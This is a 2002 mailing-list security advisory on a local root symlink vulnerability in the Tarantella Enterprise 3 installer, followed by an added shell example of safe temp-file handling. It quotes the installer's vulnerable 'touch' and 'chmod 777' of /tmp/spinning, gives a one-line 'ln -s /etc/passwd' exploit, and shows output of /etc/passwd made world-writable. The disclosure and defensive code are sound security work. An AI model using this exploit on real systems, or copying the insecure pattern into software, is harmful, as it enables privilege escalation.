Another local root vulnerability during installation of Tarantella Enterprise 3.

From: Larry W. Cashdollar (lwcat_private)
Date: Tue Feb 19 2002 - 05:22:55 PST

    
    Larry W. Cashdollar
    Vapid Labs
    2/18/2002
    
    
    Another local root vulnerability during installation of Tarantella
    Enterprise 3.
    
    
    During installation a "twirling / \ | - " text graphic is displayed (you
    remember them from the shareware games in DOS days..). They create a file
    in /tmp called spinning to determine what state the installation is in.
    The file's permissions are changed to read, write, execute for all, and it is
    removed and recreated during different stages of the installation. It is
    vulnerable to a simple symlink attack.
    
    Problem Code:
    <----snip---->
    touch /tmp/spinning >/dev/null 2>&1
    chmod 777 /tmp/spinning >/dev/null 2>&1
    <----snip---->
    
    Exploit:
    There is no race condition here, just create the link.
    
    [lwc@misery] ln -s /etc/passwd  /tmp/spinning
    
    Wait until root is done installing...
    
    [lwc@misery] ls -l /etc/passwd
    -rwxrwxrwx    1 root     root         1094 Feb 18 22:39 /etc/passwd
    
    
    Recommendations:
    I again recommend that the target system be running in single-user mode before
    this software is installed.
    
    
    The vendor has been notified and plans to fix this in the next release.
    
    
    
    http://vapid.dhs.org
    
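The pattern the advisory describes, a fixed name under /tmp created with `touch` and then `chmod 777`, is what makes the symlink attack work. The following is an added example (not from the advisory or the vendor's installer) of how an installer could keep such a state file safely: refuse any path that is already a symlink or is not owned by the installing user, and put the file in a private mode-0700 directory from `mktemp -d` so no predictable world-writable path ever exists. It assumes POSIX sh with `mktemp(1)` and a `test` that supports `-O` (bash, dash and ksh do).

```shell
#!/bin/sh
# Added example: safer handling of an installer "spinner" state file.
# Replaces the vulnerable `touch /tmp/spinning; chmod 777 /tmp/spinning`.

# Refuse to use a state-file path that already exists as a symlink or as
# a file we do not own.  Returns 0 only when the path is safe to create.
state_path_is_safe() {
    p="$1"
    if [ -L "$p" ]; then
        echo "refusing $p: it is a symlink" >&2
        return 1
    fi
    if [ -e "$p" ] && [ ! -O "$p" ]; then
        echo "refusing $p: exists and is not owned by us" >&2
        return 1
    fi
    return 0
}

# Create the state file inside a freshly made private directory instead
# of at a predictable world-writable path.  Prints the path of the file.
make_state_file() {
    dir=$(mktemp -d) || return 1      # unpredictable name, mode 0700
    chmod 700 "$dir" || return 1      # belt and braces on older mktemp
    f="$dir/spinning"
    state_path_is_safe "$f" || return 1
    # umask 077 so the file is created 0600; no other user needs it.
    (umask 077 && : > "$f") || return 1
    echo "$f"
}
```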



    This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 11:18:45 PST